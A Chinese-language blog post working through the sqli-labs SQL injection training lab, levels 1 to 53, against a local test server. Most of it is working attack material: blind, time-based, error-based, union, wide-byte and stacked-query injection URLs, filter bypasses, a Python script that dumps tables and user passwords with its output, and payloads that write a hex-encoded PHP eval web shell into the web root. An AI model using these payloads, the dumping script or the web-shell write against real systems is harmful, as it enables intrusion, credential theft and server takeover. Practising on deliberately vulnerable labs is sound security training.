<!DOCTYPE html>



 <html class="no-js"> 
<head>
    <title>Sqlilabs  &middot; BlankのBlog </title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta http-equiv="content-language" content="en-us" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="Blank">
    <meta name="description" content="">
    <link rel="shortcut icon" href="https://blank233.github.io/%0Aimg/clover.png" type="image/x-icon" />
    <meta name="generator" content="Hugo 0.37.1" />

    <!-- Stylesheets -->
    <link rel="stylesheet" href="https://blank233.github.io/%0Acss/smooth-scrollbar.css" />
    <link rel="stylesheet" type="text/css" href="https://blank233.github.io/%0Acss/main.css" />
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/8.6/styles/tomorrow.min.css" />
    

    <style>
        .posts li {
            visibility: hidden;
        }
    </style>
</head>
<body>
    
    

    <header>	
	<div class="h-wrap">
		
		<h1 class="title"><a href="https://blank233.github.io/%0A">BlankのBlog</a></h1>
		
	</div>
</header>
    
    <div class="site-wrapper" id="full-wrapper">
        <a name="top"></a>
        <section class="single-wrap">
            <article class="single-content" itemscope itemtype="//schema.org/BlogPosting">
                <div class="feat">
                    <h5 class="page-date">
                    <time datetime="" itemprop="datePublished">
                    30 March 2018
                   
                    </time>
                    </h5>
                </div>
                <h1 class="page-title" itemprop="name headline">Sqlilabs</h1>
                
                
                <h6>Topic:<a href="https://blank233.github.io/%0Atopics/web">web</a>
                Tag:<a href="https://blank233.github.io/%0Atags/2018-03">2018-03</a></h6>

                <div itemprop="articleBody">
                    <p>sqlilabs还没系统的做过 立个帖子 记录一下</p>

<p></p>

<h2 id="less1">less1</h2>

<p>没啥好说的 单引号闭合</p>

<h2 id="less2">less2</h2>

<p>没啥好说的 整形 可以用2-1测试</p>

<h2 id="less3">less3</h2>

<p>加&rsquo; 报错</p>

<pre><code>Erreur de syntaxe près de ''1'') LIMIT 0,1' à la ligne 1
''1'') LIMIT 0,1' 最外层单引号表示错误语句，去掉后就是
'1'') LIMIT 0,1 然后我输入的是1' 而构成的sql语句是'1'') 可以看到1'被')包裹
也就是'）闭合 其他就没啥
</code></pre>

<h2 id="less4">less4</h2>

<p>&rdquo;)闭合  判断方式跟3差不多</p>

<h2 id="less5">less5</h2>

<p>这里有一个改变就是，如果查询语句正确就返回you are in&hellip; 不在有其他回显，所以无法使用1-4的方法，而是使用盲注</p>

<p>首先还是判断闭合方式 加一个单引号报错</p>

<pre><code> Erreur de syntaxe près de ''1'' LIMIT 0,1' à la ligne 1
</code></pre>

<p>可以看到 是&rsquo;闭合</p>

<p>这时候可以先判断一下数据库名字的长度</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20length(database())=8%23
</code></pre>

<p>当前数据库为security 长度为8 所以会返回正常</p>

<p>判断数据库第一个字符</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20left(database(),1)%3E%27a%27%23
</code></pre>

<p>判断数据库第一位是否大于a 在一般不知道数据库名称的情况下可以使用二分法来提升效率</p>

<p>判断数据库第二个字符</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20left(database(),2)%3E%27sa%27%23
</code></pre>

<p>这里是判断第二位是否大于a 以此类推推断出数据库名称</p>

<p>得到数据库名称后就该尝试得到数据表名称</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%23
</code></pre>

<p>这里是选择security数据库第一个表的第一个字符的ascii值是否大于100  当然  在这里security可以替换成database() 由于select语句返回的是所有的表名 所以加一个limit限制我们取第一行 也就是第一个表</p>

<p>获取第二个字符只需要将mid函数的第二个参数改成2就好</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),2,1))%3E100%23
</code></pre>

<p>获取第二个表的名字我们只需要更改limit的第一个参数即可
关于limit 第一个参数是起始位置 第二个参数表示偏移量</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%201,1),1,1))%3E100%23
</code></pre>

<p>然后这样可以获取所有的表名 接下来就要获取列名</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27limit%201,1),1,1))%3E100%23
</code></pre>

<p>判断security.users里面第一个列名的第一个字符的ascii是否大于100 判断第二个字符更改mid的参数即可 判断第二个列则更改limit的参数即可 当然 也可以用regexp的方法来匹配</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%201=(select%201%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20column_name%20regexp%20%27^use[a-z]%27)%23
</code></pre>

<p>判断判断security.users里面的列名是否含有use 其中&rsquo;^use[a-z]&lsquo;表示匹配use以及后面跟着1到n个字母的字符串 在本例中 如果将正则改为&rsquo;^username[a-z]&lsquo;则匹配不到</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%201=(select%201%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20column_name%20regexp%20%27^username%27)%23
</code></pre>

<p>判断是否含有username的列 将username更改成password,id亦可以</p>

<p>知道了数据库名，表名，列名  接下来就是喜闻乐见的爆数据了</p>

<pre><code>http://127.0.0.1/sql/Less-5/?id=1%27and%20mid((select%20username%20from%20security.users%20limit%200,1),1,1)%3E%27c%27%23
</code></pre>

<p>判断security.users里第一个username的第一个值的第一个字符是否大于c 以此类推 第一个值的第二个字符只需更改mid的参数 查询其他值更改limit参数</p>

<p>附less-5的一个盲注脚本 自己写的 感觉已经很精简算法了  但是速度还是不尽人意</p>

<pre><code>import requests

def length_schema():
    for x in range(1,20):
        url = 'http://127.0.0.1/sql/Less-5/?id=1%27and%20length(database())='+str(x)+'%23'
        s = requests.get(url)
        if &quot;You are in&quot; in s.text:
            print 'schema_length is :' + str(x)
            global a
            a = int(x)
            schema_name()
            break
        
def schema_name():
    x = 0
    name = ''
    while x &lt; a:
        x = x + 1
        temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&amp;*()_+=-|}{:?&gt;&lt;[];,.`~' 
        for i in temp:
            url = 'http://127.0.0.1/sql/Less-5/?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
            s = requests.get(url)
            if &quot;You are in&quot; in s.text:
                name = name + str(i)

    print 'sechma_name is :' + name
    global schema_name
    schema_name = name
    all()

def all():
    temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&amp;*()_+=-|}{:?&gt;&lt;[];,.`~'
    temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&amp;*()_+=-|}{:?&gt;&lt;[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for x in xrange(0,20):
        table_name = ''
        for y in xrange(1,20):
            key = 0
            for i in temp:
                url = 'http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
                s = requests.get(url)
                if &quot;You are in&quot; in s.text:
                    key = 1
                    table_name = table_name + str(i)
            if key == 0:
                break
        if table_name == '':
            break
        print 'one of tables is:' + table_name
        for p in xrange(0,20):
            column_name = ''
            for q in xrange(1,20):
                key = 0
                for i in temp:
                    url_columns = 'http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
                    s = requests.get(url_columns)
                    if &quot;You are in&quot; in s.text:
                        key = 1
                        column_name = column_name + str(i)
                if key ==0:
                    break
            if column_name == '':
                break
            print 'a column name of '+table_name+' is '+column_name
            for y in xrange(0,10):
                data = ''
                for z in xrange(1,20):
                    key = 0
                    for i in temp_data:
                        url_data = 'http://127.0.0.1/sql/Less-5/?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20'+schema_name+'.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
                        s = requests.get(url_data)
                        if &quot;You are in&quot; in s.text:
                            data = data + str(i)
                            key = 1
                    if key == 0:
                        break
                if data == '':
                    break
                print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data


length_schema()
</code></pre>

<p>执行结果</p>

<pre><code>D:\py_test&gt;python ctf.py
schema_length is :8
sechma_name is :security
one of tables is:emails
a column name of emails is id
one data of security.emails's id is 1
one data of security.emails's id is 2
one data of security.emails's id is 3
one data of security.emails's id is 4
one data of security.emails's id is 5
one data of security.emails's id is 6
one data of security.emails's id is 7
one data of security.emails's id is 8
a column name of emails is email_id
one data of security.emails's email_id is Dumb@dhakkan.com
one data of security.emails's email_id is Angel@iloveu.com
one data of security.emails's email_id is Dummy@dhakkan.local
one data of security.emails's email_id is secure@dhakkan.loca
one data of security.emails's email_id is stupid@dhakkan.loca
one data of security.emails's email_id is superman@dhakkan.lo
one data of security.emails's email_id is batman@dhakkan.loca
one data of security.emails's email_id is admin@dhakkan.com
one of tables is:referers
a column name of referers is id
a column name of referers is referer
a column name of referers is ip_address
one of tables is:uagents
a column name of uagents is id
a column name of uagents is uagent
a column name of uagents is ip_address
a column name of uagents is username
one of tables is:users
a column name of users is id
one data of security.users's id is 1
one data of security.users's id is 2
one data of security.users's id is 3
one data of security.users's id is 4
one data of security.users's id is 5
one data of security.users's id is 6
one data of security.users's id is 7
one data of security.users's id is 8
one data of security.users's id is 9
one data of security.users's id is 10
a column name of users is username
one data of security.users's username is Dumb
one data of security.users's username is Angelina
one data of security.users's username is Dummy
one data of security.users's username is secure
one data of security.users's username is stupid
one data of security.users's username is superman
one data of security.users's username is batman
one data of security.users's username is admin
one data of security.users's username is admin1
one data of security.users's username is admin2
a column name of users is password
one data of security.users's password is Dumb
one data of security.users's password is Angeline
one data of security.users's password is Dummy
one data of security.users's password is secure
one data of security.users's password is stupid
one data of security.users's password is superman
one data of security.users's password is batman
one data of security.users's password is admin
one data of security.users's password is admin1
one data of security.users's password is admin2
</code></pre>

<h2 id="less6">less6</h2>

<p>&ldquo;闭合  其他跟less5一样</p>

<h2 id="less7">less7</h2>

<p>?id=1 页面返回You are in use into outfile</p>

<p>大概思路就是使用into outfile写一句话木马到服务器上，首先还是判断闭合方式，不在赘述，如果是在实战中或者其他ctf平台上，接下来就是找绝对路径了，本地搭建的平台所以可以忽略这一步，再就是一句话木马要转成16进制格式 payload如下</p>

<pre><code>http://127.0.0.1/sql/Less-7/?id=1%27))union%20select%201,2,0x3c3f70687020406576616c28245f504f53545b2761275d293f3e%20into%20outfile%20%27E:/wamp/wamp/www/sql/Less-7/1.php%27%23
ps:在win下，路径是\分隔，但是由于是在url中，\会被认定为转义符，所以用/或\\
</code></pre>

<p>执行后尽管报错了 但是当我们访问1.php的时候还是可以访问的 接下来就可以使用菜刀连接了</p>

<h2 id="less-8">less-8</h2>

<p>还是盲注，使用less-5的payload也是可以的 查看源代码可以看到跟less-5的区别就在于对sql的报错进行了注释，所以无法使用报错注入</p>

<h2 id="less-9">less-9</h2>

<p>看标题可以知道是时间盲注，单引号闭合，先是判断数据库的第一个字符</p>

<pre><code>http://127.0.0.1/sql/Less-9/?id=1%27and%20if(ascii(mid(database(),1,1))=115,sleep(2),1)%23
</code></pre>

<p>如果数据库第一个字符的ascii值为115，就会sleep两秒，判断第二个字符更改mid函数的第二个参数即可，然后以此类推得到数据库名称。手注时，有一个前提就是知道数据库的长度 payload如下。</p>

<pre><code>http://127.0.0.1/sql/Less-9/?id=1%27and%20if(length(database())=8,sleep(2),1)%23
</code></pre>

<p>然后是判断表名</p>

<pre><code>http://127.0.0.1/sql/Less-9/?id=1%27and%20if(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))=101,sleep(2),1)%23
</code></pre>

<p>判断第一个表的第一个字符的ascii值是否位101，是就停顿2秒，判断第二个字符更改mid参数，判断其他表更改limit参数</p>

<p>判断列名</p>

<pre><code>http://127.0.0.1/sql/Less-9/?id=1%27and%20if(ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1),1,1))=105,sleep(2),1)%23
</code></pre>

<p>判断emails表的第一个列的第一个字符的ascii值是否为105，是就停顿2秒，判断第二个字符更改mid参数，判断其他表更改limit参数</p>

<p>爆数据</p>

<pre><code>http://127.0.0.1/sql/Less-9/?id=1%27and%20if(ascii(mid((select%20username%20from%20security.users%20limit%200,1),1,1))=68,sleep(2),1)%23
</code></pre>

<p>判断security.users里面username的第一个数据的第一个字符的ascii值是否为68</p>

<h2 id="less-10">less-10</h2>

<p>跟less-9没啥太大区别，就是改成了双引号闭合</p>

<h2 id="less-11">less-11</h2>

<p>到了less-11就是post注入了 可以先输入一个正确的username和password，比如Dumb和Dumb，可以看到页面返回正常并给出了你的用户名跟密码，然后可以试试万能密码admin&rsquo; or 1=1#密码任意输入，发现一样可以登陆，表示我们闭合前面的成功了 然后就可以在or 1=1的位置来进行我们的sql注入了</p>

<p>还是先使用order by判断列数 admin&rsquo; order by 2#</p>

<p>接下来就是使用联合查询慢慢注了 不在赘述 -admin&rsquo; union select 1,database()#</p>

<h2 id="less-12">less-12</h2>

<p>双引号+括号闭合 其他的跟11一样</p>

<h2 id="less-13">less-13</h2>

<p>还是先输入正确的账号跟密码 发现只是先是登陆成功 不在有其他回显</p>

<p>输入admin’ 密码随便输 报错</p>

<pre><code>Erreur de syntaxe près de '1') LIMIT 0,1' à la ligne 1
</code></pre>

<p>可以看到是&rsquo;)闭合  测试语句admin&rsquo;) and length(database())=8# 密码随便输入</p>

<p>可以看到返回正常  说明数据库长度为8 测试语句 admin&rsquo;) and ascii(mid(database(),1,1))=115# 判断数据库第一个字符的ascii是否为115  其他可以参考less-5的布尔盲注，基本上一样</p>

<h2 id="less-14">less-14</h2>

<p>输入admin&rdquo; 密码为空 报错可以看到是双引号闭合  然后盲注</p>

<h2 id="less-15">less-15</h2>

<p>这一关注释了错误提示，看标题可以知道是时间盲注单引号闭合 测试语句 admin&rsquo; or 1=1# 密码随便输 成功登陆</p>

<p>测试语句 admin&rsquo; and if(ascii(mid(database(),1,1))=115,sleep(2),1)#</p>

<p>其他跟less-9差不多吧</p>

<h2 id="less-16">less-16</h2>

<p>与less-15的区别就在于闭合方式不同  这是双引号闭合</p>

<h2 id="less-17">less-17</h2>

<p>一个更新数据的地方，尝试输入username=admin newpassword=&rsquo; 报错 发现user是单引号包裹  也就是单引号闭合</p>

<p>然后在newpassword处构建注入语句  比如布尔盲注</p>

<pre><code>uname=admin&amp;passwd=' and length(database())=8#&amp;submit=Submit
</code></pre>

<p>比如 报错盲注</p>

<pre><code>uname=admin&amp;passwd=' and extractvalue(1,concat(user()))#&amp;submit=Submit
</code></pre>

<p>附：<a href="http://www.cnblogs.com/lcamry/p/5763042.html">常用的报错盲注</a></p>

<p>至于为啥不在uname处进行注入，查看源代码可以看到，源代码对uname进行了一个处理</p>

<h2 id="less-18">less-18</h2>

<p>查看源代码可以看到，对我们输入的usernam和password都进行了check处理，但是可以看到一个insert语句</p>

<pre><code>INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
</code></pre>

<p>可以在uagent处构建注入语句</p>

<pre><code>INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1' and extractvalue(1,concat(user())) and '1'='1', '$IP', $uname)
</code></pre>

<h2 id="less-19">less-19</h2>

<p>在refere处构建注入语句，跟18一样</p>

<h2 id="less-20">less-20</h2>

<p>从源码中可以看到，当第一访问时会设置一个包含uname的cookie，当再次访问时会从cookie中获取uname值，构造cookie</p>

<pre><code>Cookie: uname=' union select 1,2,user()#; _ga=GA1.1.208750863.1521028790  
</code></pre>

<p>或</p>

<pre><code>Cookie: uname=admin' and extractvalue(1,concat(user()))#; _ga=GA1.1.208750863.1521028790
</code></pre>

<h2 id="less-21">less-21</h2>

<p>跟20差不多，闭合变成了&rsquo;),再就是把username base64加密了 只需把payload语句进行一下加密就行</p>

<pre><code>Cookie: uname=Cookie: uname=admin' and extractvalue(1,concat(user()))#; _ga=GA1.1.208750863.1521028790; _ga=GA1.1.208750863.1521028790
</code></pre>

<h2 id="less-22">less-22</h2>

<p>双引号闭合，其他跟20一样</p>

<pre><code>Cookie: uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQodXNlcigpKSkj; _ga=GA1.1.208750863.1521028790
</code></pre>

<h2 id="less-23">less-23</h2>

<p>把#和&ndash;替换成空</p>

<p>可以使用报错注入</p>

<pre><code>http://127.0.0.1/sql/Less-23/?id=1%27%20and%20updatexml(1,concat(0x7e,version()),1)%20and%20%271%27=%271
</code></pre>

<h2 id="less-24">less-24</h2>

<p>本关为二次排序注入的示范例。二次排序注入也成为存储型的注入，就是将可能导致sql注入的字符先存入到数据库中，当再次调用这个恶意构造的字符时，就可以出发sql注入。二次排序注入思路：</p>

<ol>
<li><p>黑客通过构造数据的形式，在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。</p></li>

<li><p>服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。</p></li>

<li><p>黑客向服务端发送第二个与第一次不相同的请求数据信息。</p></li>

<li><p>服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。</p></li>

<li><p>服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。</p></li>
</ol>

<p>此例子中我们的步骤是注册一个admin&rsquo;#的账号，接下来登录该帐号后进行修改密码。此时修改的就是admin的密码。</p>

<p>Sql语句变为UPDATE users SET passwd=&ldquo;New_Pass&rdquo; WHERE username =&rsquo; admin&rsquo; # &lsquo; AND password=&rsquo; ，也就是执行了UPDATE users SET passwd=&ldquo;New_Pass&rdquo; WHERE username =&rsquo; admin&rsquo;</p>

<h2 id="less-25">less-25</h2>

<p>过滤了or和and 双写绕过</p>

<pre><code>http://127.0.0.1/sql/Less-25/?id=1%27%20anandd%20extractvalue(1,concat(0x7e,user()))%23
</code></pre>

<h2 id="less-25a">less-25a</h2>

<p>查看源代码可以看到，整形无闭合，关闭了错误回显，所以无法使用报错</p>

<pre><code>http://127.0.0.1/sql/Less-25a/?id=-1%20union%20select%201,2,user()%23
</code></pre>

<h2 id="less-26">less-26</h2>

<p>过滤了or and / * &ndash; # 空格 \</p>

<p>使用()代替空格</p>

<pre><code>http://127.0.0.1/sql/Less-26/?id=1%27anandd(updatexml(1,concat(0x7e,user()),1))%20anandd%20%271%27=%271
</code></pre>

<h2 id="less-26a">less-26a</h2>

<p>闭合方式变了而已 其他没变</p>

<h2 id="less-27">less-27</h2>

<p>过滤了/ * &ndash; # 空格 + select union UNION SELECT Union Select</p>

<pre><code>http://127.0.0.1/sql/Less-27/?id=1%27and(updatexml(1,concat(0x7e,user()),1))and%271%27=%271

http://127.0.0.1/sql/Less-27/?id=1%27and(updatexml(0,concat(0x7e,(SElECT(concat(table_name))FROM(information_schema.tables)WHERE(table_schema=database())limit%0d0,1)),0))and%271%27=%271

</code></pre>

<h2 id="less-27a">less-27a</h2>

<p>区别在于关闭了错误回显以及闭合方式的改变  双引号闭合 无法使用报错注入</p>

<pre><code>http://127.0.0.1/sql/Less-27a/?id=1&quot;order%0aby%0a3;%00

http://127.0.0.1/sql/Less-27a/?id=a%22UniOn%0asElect%0a1,2,group_concat(schema_name)%0afrom%0ainformation_schema.schemata;%00
</code></pre>

<h2 id="less-28">less-28</h2>

<p>过滤了/ * &ndash; # 空格 + 以及</p>

<pre><code>$id= preg_replace('/union\s+select/i',&quot;&quot;, $id); 
</code></pre>

<p>布尔盲注</p>

<pre><code>http://127.0.0.1/sql/Less-28/?id=1%27)%0aand%0amid((select%0atable_name%0afrom%0a%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a0,1),1,1)=%27e%27;%00
</code></pre>

<p>网上说unino%a0select以及union/<em>%aa</em>/select也能绕过,但是我不行啊，，，</p>

<h2 id="less-28a">less-28a</h2>

<p>这次只是过滤了union select组合，可以用内联注释分隔关键词 绕过</p>

<pre><code>http://127.0.0.1/sql/Less-28a/?id=1%27)%20union/**/select%201,2,user()%23
</code></pre>

<h2 id="less-29">less-29</h2>

<p>无过滤</p>

<pre><code>http://127.0.0.1/sql/Less-29/?id=a%27union%20select%201,2,user()%23
</code></pre>

<p>但是报错注入用不了，，</p>

<h2 id="less-30">less-30</h2>

<p>双引号</p>

<pre><code>http://127.0.0.1/sql/Less-30/?id=a%22union%20select%201,2,user()%23
</code></pre>

<h2 id="less-31">less-31</h2>

<p>双引号+括号</p>

<pre><code>http://127.0.0.1/sql/Less-31/?id=a%22)union%20select%201,2,user()%23
</code></pre>

<h2 id="less-32">less-32</h2>

<p>宽字节注入</p>

<p>查看源代码，可以看到转义了&rsquo;&ldquo;/ 也就是&rsquo;=&gt;\&rsquo; &ldquo;=&gt;\&rdquo; \=&gt;\ 但是</p>

<pre><code>mysql_query(&quot;SET NAMES gbk&quot;);
</code></pre>

<p>也就是使用gbk方式把数据写入数据库，首先在gbk编码中，一个汉字占2个字节，在utf-8中一个汉字占3个字节</p>

<p>所以当我们输入%df&rsquo;时，%df这个字节和\一起被gbk认为是一个汉字 当然被认为是汉字的前提是前一个值的ascii大于128，然后&rsquo;就逃出来了</p>

<p>在宽字节注入有一点要注意的就是，由于&rsquo;被转义了，所以当我们标识数据库名数据列名时需要16进制转化 这里只需要将users转化成16进制就行，无需带&rdquo;</p>

<pre><code>http://127.0.0.1/sql/Less-32/?id=a%df%27union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273)%23
</code></pre>

<h2 id="less-33">less-33</h2>

<p>跟32没太大区别</p>

<h2 id="less-34">less-34</h2>

<p>post型的宽字节注入</p>

<pre><code>�' and updatexml(1,concat(0x7e,user()),1)#
</code></pre>

<h2 id="less-35">less-35</h2>

<p>和32的区别在于没有对id进行包裹，也就无需闭合</p>

<pre><code>http://127.0.0.1/sql/Less-35/?id=-1%20union%20select%201,2,user()%23
</code></pre>

<p>但是有一个问题就是 当把id=a或其他字符时会报错，有点迷</p>

<h2 id="less-36">less-36</h2>

<pre><code>http://127.0.0.1/sql/Less-36/?id=a%df%27union%20select%201,user(),version()%23
</code></pre>

<h2 id="less-37">less-37</h2>

<p>跟34区别不大</p>

<pre><code>�' and updatexml(1,concat(0x7e,user()),1)#
</code></pre>

<h2 id="less-38">less-38</h2>

<p>堆叠注入，不知道意义何在，，，</p>

<pre><code>http://127.0.0.1/sql/Less-38/?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2720%27,%27test%27,%27test%27)%23
</code></pre>

<h2 id="less-39">less-39</h2>

<pre><code>http://127.0.0.1/sql/Less-39/?id=1;insert%20into%20users(id,username,password)%20values%20(%2716%27,%27test%27,%27test%27)%23
</code></pre>

<h2 id="less-40">less-40</h2>

<pre><code>http://127.0.0.1/sql/Less-40/?id=1%27);insert%20into%20users(id,username,password)%20values%20(%2716%27,%27test%27,%27test%27)%23
</code></pre>

<h2 id="less-41">less-41</h2>

<pre><code>http://127.0.0.1/sql/Less-41/?id=2;insert%20into%20users(id,username,password)%20values%20(%2716%27,%27test%27,%27test%27)%23
</code></pre>

<h2 id="less-42">less-42</h2>

<p>从源码中可以看到，对传入的username进行了一个mysqli_real_escape_string处理，password则没有，所以可以在password处构建payload</p>

<pre><code>username :1
password :1';insert into users (id,username,password) values('16','test','test');
</code></pre>

<h2 id="less-43">less-43</h2>

<p>闭合方式变了</p>

<pre><code>username :1
password :1');insert into users (id,username,password) values('16','test','test');
</code></pre>

<h2 id="less-44">less-44</h2>

<p>与42相比关掉了错误回显</p>

<pre><code>username :1
password :1';insert into users (id,username,password) values('16','test','test');
</code></pre>

<h2 id="less-45">less-45</h2>

<p>与43相比关掉了错误回显</p>

<pre><code>username :1
password :1');insert into users (id,username,password) values('16','test','test');
</code></pre>

<h2 id="less-46">less-46</h2>

<p>Order By 注入</p>

<p>order by后面的数字可以作为一个注入点，可以利用and</p>

<pre><code>http://127.0.0.1/sql/Less-46/?sort=1%20and%20(select%20updatexml(1,concat(0x7e,mid((select%20group_concat(username)%20from%20security.users),1,31)),1))
</code></pre>

<p>可以使用(select &hellip;.)</p>

<pre><code>http://127.0.0.1/sql/Less-46/?sort=(select%20count(*)%20from%20information_schema.columns%20group%20by%20concat(0x7e,(select%20user()),0x7e,floor(rand(0)*2)))
</code></pre>

<p>也可以直接挂马</p>

<pre><code>http://127.0.0.1/sql/Less-46/?sort=1%20into%20outfile%20%27E:/wamp/wamp/www/1.php%27%20lines%20terminated%20by%200x3c3f70687020406576616c28245f504f53545b615d293b3f3e
</code></pre>

<p>盲注,利用rand(true)和rand(false)返回结果不同盲注</p>

<pre><code>http://127.0.0.1/sql/Less-46/?sort=rand(true)
http://127.0.0.1/sql/Less-46/?sort=rand(false)
</code></pre>

<p>ETC&hellip;</p>

<h2 id="less-47">less-47</h2>

<p>测试1&rsquo; 返回错误  1&rdquo;返回正常  单引号闭合</p>

<pre><code>http://127.0.0.1/sql/Less-47/?sort=1%27and%20if(ascii(mid(database(),1,1))=115,0,sleep(5))--+
</code></pre>

<h2 id="less-48">less-48</h2>

<p>关掉了错误回显  其他跟46一样</p>

<h2 id="less-49">less-49</h2>

<p>无错误回显，单引号闭合</p>

<pre><code>http://127.0.0.1/sql/Less-49/?sort=1%27%20and%20if(ascii(mid(database(),1,1))=111,0,sleep(5))%23
</code></pre>

<h2 id="less-50">less-50</h2>

<p>与46区别在于，50使用mysqli_multi_query($con1, $sql)查询，可以查询多条语句，46只能查询1条</p>

<p>46方法同样可以在50使用</p>

<pre><code>http://127.0.0.1/sql/Less-50/?sort=1;insert%20into%20users%20(id,username,password)%20values(%2716%27,%27test%27,%27test%27);
</code></pre>

<h2 id="less-51">less-51</h2>

<pre><code>http://127.0.0.1/sql/Less-51/?sort=1%27;insert%20into%20users%20(id,username,password)%20values(%2716%27,%27test%27,%27test%27);%27
</code></pre>

<h2 id="less-52">less-52</h2>

<pre><code>http://127.0.0.1/sql/Less-52/?sort=1;insert%20into%20users%20(id,username,password)%20values(%2716%27,%27test%27,%27test%27);%27
</code></pre>

<h2 id="less-53">less-53</h2>

<pre><code>http://127.0.0.1/sql/Less-53/?sort=1%27;insert%20into%20users%20(id,username,password)%20values(%2716%27,%27test%27,%27test%27);%27
</code></pre>

<hr />

<p>后续的挑战，不打算更了，算是完结了</p>                    
                </div>
                <h6>千帆过尽，勿忘初心 <a href="#top"> UP </a></h6>
                <div class="feat share">
                </div>

                
            </article>
        </section>
        <footer>
	
</footer>

    </div>

    <div class="next-prev-arrows">
        
            <a rel="next" href="https://blank233.github.io/%0A/2018/04/02/april_plan/" id="next">
                &larr; <span class="nav-title nav-title-next">April_plan</span> 
            </a>
        
        
            <a rel="prev" href="https://blank233.github.io/%0A/2018/03/28/md5%E7%A2%B0%E6%92%9E/" id="prev">
                 <span class="nav-title nav-title-prev">Md5碰撞</span> &rarr;
            </a>
        
    </div>

    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="https://blank233.github.io/%0Ajs/scrollreveal.min.js"></script>
<script type='application/javascript' src='https://blank233.github.io/%0Ajs/smooth-scrollbar.js'></script>
<script src="https://blank233.github.io/%0Ajs/baffle.min.js"></script>
<script src="https://blank233.github.io/%0Ajs/main.js"></script>






<!-- Syntax highlighting -->
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.6/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

    <script src="https://blank233.github.io/%0Ajs/chick.js"></script>
</body>
</html>
